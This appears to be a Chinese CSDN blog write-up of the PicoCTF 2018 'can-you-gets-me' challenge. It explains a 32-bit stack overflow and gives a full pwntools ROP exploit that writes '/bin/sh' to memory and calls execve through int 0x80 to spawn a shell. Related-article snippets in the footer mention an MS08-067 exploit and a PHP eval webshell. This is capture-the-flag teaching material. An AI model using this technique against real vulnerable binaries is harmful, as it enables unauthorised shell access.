非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me

最新推荐文章于 2023-12-17 12:50:03 发布
最新推荐文章于 2023-12-17 12:50:03 发布
阅读量487 收藏
点赞数 1
分类专栏: 栈溢出 ROP 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/107783670
版权

前言:

对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。

解题思路

查看保护

在这里插入图片描述
只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。

进入IDA查看伪代码

打开IDA,如果是第一次见这种题目就会傻眼了。
在这里插入图片描述
题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。
题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。
乍一看,好像没什么办法了,但是我们可以用程序中非常多的gadget来调用系统调用。

目标:execve(0xb, “/bin/sh”, 0, 0);

既然是系统调用,我们就很容易想到execve来getshell,而程序中也正好有这些gadgets,包括最重要的int 0x80。
而execve的结构是:

eax = 0x0b
ebx = address of "/bin/sh"
ecx = 0
edx = 0

我们就用ROPgadget来找到我们想要的gadget。

0x080b81c6 : pop eax ; ret
0x0806f02a : pop edx ; ret
0x0806f051 : pop ecx ; pop ebx ; ret
0x080549db : mov [edx], eax;ret
0x08049303 : xor eax, eax ; ret
0x0808f097 : add eax, 2 ; ret
0x0808f0b0 : add eax, 3 ; ret
0x0806cc25 : int 0x80
0x080481b2 : ret

而且我们还需要把/bin/sh放到一个地方,放在哪里合适呢?

0x08048000 0x080e9000 r-xp	/mnt/hgfs/share/buuctf/PicoCTF_2018_can-you-gets-me/PicoCTF_2018_can-you-gets-me
0x080e9000 0x080eb000 rw-p	/mnt/hgfs/share/buuctf/PicoCTF_2018_can-you-gets-me/PicoCTF_2018_can-you-gets-me   #毫无疑问,放在这里可写的地方最合适
0x080eb000 0x0810e000 rw-p	[heap]
0xf7ffa000 0xf7ffd000 r--p	[vvar]
0xf7ffd000 0xf7ffe000 r-xp	[vdso]
0xfffdd000 0xffffe000 rw-p	[stack]

我们就放在0x080e9000到0x080eb000之间就行
然后我们用我们找到的gadgets来构造exp就可以了。

完整exp:

#! /usr/bin/env python
from pwn import *

p = process('./PicoCTF_2018_can-you-gets-me')
#p = remote('node3.buuoj.cn', 28541)

writeable_memory = 0x080e9040
binsh = 0x80e9040
int80 = 0x0806cc25
ret = 0x080481b2

pop_eax = 0x080b81c6
pop_edx = 0x0806f02a
pop_ecx_ebx = 0x0806f051
mov_eax_to_edx = 0x080549db

set_eax_zero = 0x08049303
add_eax_two = 0x0808f097
add_eax_three = 0x0808f0b0

payload = ""
payload += "A"*28

payload += p32(pop_edx)
payload += p32(writeable_memory)

payload += p32(pop_eax)
payload += "/bin"

payload += p32(mov_eax_to_edx)

writeable_memory += 4

payload += p32(pop_edx)
payload += p32(writeable_memory)

payload += p32(pop_eax)
payload += "/sh\x00"

payload += p32(mov_eax_to_edx)

writeable_memory += 3

payload += p32(set_eax_zero)
payload += p32(pop_edx)

payload += p32(writeable_memory)    #   让字符串以空结尾
payload += p32(mov_eax_to_edx)

payload += p32(pop_ecx_ebx)
payload += p32(0)
payload += p32(binsh)

payload += p32(pop_edx)
payload += p32(0)

payload += p32(set_eax_zero)
payload += p32(add_eax_three)
payload += p32(add_eax_three)
payload += p32(add_eax_three)
payload += p32(add_eax_two)     # eax = 0x0b

payload += p32(int80)
payload += p32(ret)

p.recvuntil("GIVE ME YOUR NAME!")
p.send(payload)
p.interactive()
PLpa、
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
picoctf_2018_shellcode
z1r0的博客
12-29 998
picoctf_2018_shellcode 查看保护 主函数不可以直接反汇编,错在call eax这里,eax拿的是ebp+var_A0这里对应的地址。发现在call vuln上面也将eax给赋了ebp+var_A0这里的地址。进vuln看一下 可以看到vuln函数中call了gets,可以写入ebp+arg_0这里的地址。而ebp+arg_0对应是地址则是main函数中ebp+var_A0中的地址。最后会call这个地址。所以写入shellcode,最后程序会自动call这里的shellcode。
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 408
[buuctf]PicoCTF_2018_shellcode,这道题主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
picoctf_2018_leak_me
qq_62887641的博客
09-20 84
32位,只开了NX有个后门,只要我们输入正确的密码就getshell了看我们输入的点,v5和s的位置这两个是紧挨着的并且password是读入到s的。
2008-MS08-067.rar_ MS08067_Amazon_MS08067_MSB-MS08-067_溢出
09-14
ms08067漏洞远程溢出代码,已测试可用,最新版,在远程电脑上开4444端口,只是感觉shellcode略差,如能反连可避过防火墙,看看哪位牛人愿意修改一下
CAN-BUS_ZCANPRO.exe
12-28
CAN-BUS_ZCANPRO.exe是一款专门针对CAN(Controller Area Network)总线系统进行诊断和数据通信的专业工具。CAN总线是一种多主站的串行通信网络,广泛应用于汽车电子、工业自动化、楼宇自动化、医疗设备等多个领域。...
V5-306_FreeRTOS实验_任务栈溢出检测方式二(模拟栈溢出).rar
01-20
V5-306_FreeRTOS实验_任务栈溢出检测方式二 (模拟栈溢出
V5-305_FreeRTOS实验_任务栈溢出检测方式一(模拟栈溢出).rar
01-20
V5-305_FreeRTOS实验_任务栈溢出检测方式一 (模拟栈溢出
数据结构-栈.zip_数据结构-栈
09-24
- **内存管理**:操作系统使用栈来分配和回收函数调用时的局部变量。 - **深度优先搜索**(DFS):在图或树的遍历中,栈常用于深度优先策略。 4. **栈的性质**: - LIFO原则:最后进入栈的元素最先离开。 - 栈...
getshell方法总结
tell_me_404的博客
03-09 3718
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 ...
云演 Can you getshell?
最新发布
samRsa
12-17 359
云演 Can you getshell?
云演-Web文件上传-writeup
qq_45628145的博客
06-14 758
getshell 看到这个猜到是文件包含型文件上传题了,后续操作确实也是这样,上传一个图片马,包含一下getshell,不过<?和?>被过滤了 改成 <script language="php"></script> 绕过一下就好了 upload-01 说要传一个php木马,传一个php上去提示说只能传gif 加一个GIF文件头,抓包改一下MIME类型上传成功,得到flag GIF89a<?php @eval($_POST['a']);?> upl
[BUUCTF]PWN——picoctf_2018_shellcode
mcmuyanga的博客
01-23 565
picoctf_2018_shellcode 附件 步骤 虽然题目都叫shellcode了,肯定没有开什么保护,但还是例行检查,32位程序 本地试运行一下,看看大概的情况 32位ida打开,没法f5,只能看汇编了,汇编太长就不截图了,做题做多了,直接看vlun,一般这个函数都有漏洞 看到vlun里调用gets,参数是ebp+arg_0,结合main函数我们可以看到,gets 函数写入的地址即为 [ebp+var_A0] 对应的地址 然后在main函数里又发现,我们gets写入的地址,下
PicoCTF-2019-WirteUp
Zichel77的博客
11-25 1393
1. 2Warm-General Skills 直接将十进制转化为二进制 picoCTF{101010} 2. Insp3ct0r-Web Exploitation https://2019shell1.picoctf.com/problem/63975/ 点击链接看到如下页面 点击What没有变化,点击How出现如下页面 说明是分别从HTML,CS...
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4139
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
栈溢出系列讲座
成功者找方法,失败者找借口!
09-01 3022
发信人: ipxodi (乐乐), 信区: Security标  题: 堆栈溢出系列讲座(1)发信站: 武汉白云黄鹤站 (Tue Feb 22 16:55:02 2000), 转信本文以及以下同系列各文为ipxodi根据alphe one, Taeho Oh 的英文资料所译及整理,你可以任意复制和分发。序言:通过堆栈溢出来获得root权限是目前使用的相当普遍的一项黑客技术。事实上这是一个黑客在系统
OpenCores Tri-mode Ethernet MAC验证计划:10/100/1000Mbps性能与功能测试
这份文档的目的是为了确保MAC(媒体访问控制)子层在不同数据速率下(全双工模式)的性能正确无误,并对特定的测试用例进行了详细的规划。 1. 测试内容概述: - **1000Mbps全双工46-1500字节长度包传输测试**:这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值